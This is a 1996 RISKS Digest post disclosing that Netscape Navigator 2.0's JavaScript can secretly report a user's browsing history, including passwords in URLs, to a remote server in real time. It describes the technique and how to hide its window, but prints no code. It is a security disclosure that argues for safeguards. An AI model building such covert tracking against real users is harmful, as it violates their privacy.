Extract from: RISKS Digest 17, Number 79

Date:    Fri, 23 Feb 96 10:03:49 -0500
From:    John Robert LoVerso <loverso@schooner.com>
Subject: Netscape Navigator 2.0 exposes user's browsing history

While riding home this past Wednesday (on my accident free commuter-rail line), I came up with an approach to utilize the JavaScript "feature" of Netscape 2.0 to track a user's browsing actions. The tracking happens in real time with the user's browser dutifully sending results back to a remote server, starting from the time the user visits a page with the devious JavaScript embedded in it. It can thus sniff any passwords or keys the user might use in a URL.

My example version runs in a browser window that the user can see. I'm only demonstrating the vulnerability. Practically, the window can be made so small as to be invisible to the casual user. It also helps that a user isn't even informed when the HTML page they just loaded has some JavaScript code within it.

Think about Netscape's new JavaScript-laden home page. The default action on startup of Netscape 2.0 is to go to that page. It could easily start off tracking your browsing actions. With the new on-line frontier being driven by advertising, the value of such a log is immense. Of course, if Netscape really wanted to do something like this, they could embed all sorts of things directly in their browser. Naturally they don't, but this is something that people often clamor about (e.g., the recent Microsoft Word and the never ending AOL controversies).

As it stands, with Netscape 2.0 you cannot disable JavaScript. You can disable Java. This is an interesting choice on their part, since at least there has been a significant effort on the part of many people to justify Java's claim of security and safeness. Thousands of people have pored over the code and specifications.

But, JavaScript and Java are totally different things. They share common names and syntax, but they don't share implementations. One is a byte compiled language executing in a restrictive state machine, the other is an interpreted scripting languages with vastly different properties. Compared with the thousands of people have looked at the source to Java, no one has seen JavaScript. Its specifications are defined by the implementation, which to date is solely Netscape 2.0. We're told it is "Secure. Cannot write to hard disk", which is how Java is also described. Is there enough commonality for such a comparison? It is hard to determine that a program is safe or secure after studying it. It is impossible without.

My particular history tracker is the third (or fourth?) way to steal private data from a user via JavaScript. It stands out as the first one that does it in real time, reporting history as the user is browsing. In an interesting bit of irony, as I was writing the code to exploit this hole, a news article from someone at Netscape appeared noting how they has fixed 2.0 during the "beta-test" period to avoid the latest of the history stealing approaches.

As it stands, JavaScript adds a viral element to HTML. I'm not sure why Netscape doesn't ship Javascript disabled by default or why they don't alarm the user before it starts to execute, or opens up new windows.

Finally, it is interesting to note that the Netscape Navigator already has the building blocks to block the execution of any JavaScript (or Java) code that doesn't come digitally signed from some trusted source. This would help provide a real safeguard against the types of attack downloaded code opens up.

My JavaScript examples are at http://www.schooner.com/~loverso/javascript/.

John Robert LoVerso
OSF Research Institute

Added note:

Did you ever try to teach someone the importance of keeping their ATM PIN secret, only to find that they never lock the doors to their house? A non-empty subset of the hosts who have visited my JavaScript "tracker" page run an X server with no access control enabled.